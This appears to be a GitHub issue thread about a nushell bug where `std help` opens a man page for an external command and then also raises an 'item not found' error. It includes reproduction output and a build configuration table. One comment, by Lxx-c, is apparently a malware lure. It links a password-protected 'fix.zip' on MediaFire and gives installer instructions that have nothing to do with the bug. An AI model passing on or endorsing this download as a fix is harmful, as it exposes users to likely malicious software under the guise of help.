### ISSUE TITLE
`std help` returns an erroneous error message

### ISSUE THREAD

**Issue by KAAtheWiseGit** [nushell/nushell#13697]
### Describe the bug

`std help` calls out to `man` when it can't find a built-in command under the same name.  And while the man page gets opened correctly, it also throws an error, because it can't find the built-in under the same name.

### How to reproduce

```Nushell
~> use std help
~> help git
Help pages from external command git:
Error:   × std::help::item_not_found
   ╭─[entry #18:1:6]
 1 │ help git
   ·      ─┬─
   ·       ╰── item not found
   ╰────
```

Here the man page was opened correctly, but after I quit the pager I saw the error.

### Expected behavior

No error.

### Configuration

| key                | value                                                        |
| ------------------ | ------------------------------------------------------------ |
| version            | 0.96.0                                                       |
| major              | 0                                                            |
| minor              | 96                                                           |
| patch              | 0                                                            |
| branch             |                                                              |
| commit_hash        |                                                              |
| build_os           | linux-x86_64                                                 |
| build_target       | x86_64-alpine-linux-musl                                     |
| rust_version       | rustc 1.80.0 (051478957 2024-07-21) (Alpine Linux 1.80.0-r0) |
| cargo_version      | cargo 1.80.0 (376290515 2024-07-16)                          |
| build_time         | 2024-07-29 21:29:54 +00:00                                   |
| build_rust_channel | release                                                      |
| allocator          | mimalloc                                                     |
| features           | default, sqlite, system-clipboard, trash                     |
| installed_plugins  | endecode 0.1.0

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NotTheDr01ds** [comment]
On mobile at the moment, but sounds like #13159 possibly?
